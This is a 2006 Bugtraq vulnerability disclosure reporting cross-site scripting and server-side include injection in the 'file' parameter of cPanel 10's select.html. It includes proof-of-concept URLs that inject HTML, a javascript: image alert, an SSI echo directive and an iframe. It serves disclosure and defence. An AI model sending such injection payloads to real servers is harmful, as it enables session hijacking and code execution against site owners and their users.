Bugtraq mailing list archives
XSS in Cpanel 10
From: preth00nker () gmail com
Date: 26 Jun 2006 03:36:08 -0000
A new vulnerability was found in Cpanel V.10; It happen cause the variable *&File* of the *select.html* file (in the edit-zone) just filter the <script>'s labels and the possibility can by open to other labels like *Server Side Include, *HMTL labels... *including Javascript expressed in other ways An attacker can use this vuln. for execute remote scripts in the browser of clients and take advantage of this for hijacking a session or execute SSI code in the own server Exploit & Examples: [+] Exploit: http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1> [+] Javascript: http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');"> [+] Server Side Inclusion http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" --> [+] HTML http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html"> ________________________________________________ discovery by the staff of http://MexHackTeam.org By Preth00nker Preth00nker [at] gmail [dot] com
Current thread:
- XSS in Cpanel 10 preth00nker (Jun 26)
- <Possible follow-ups>
- Re: XSS in Cpanel 10 bug (Jun 27)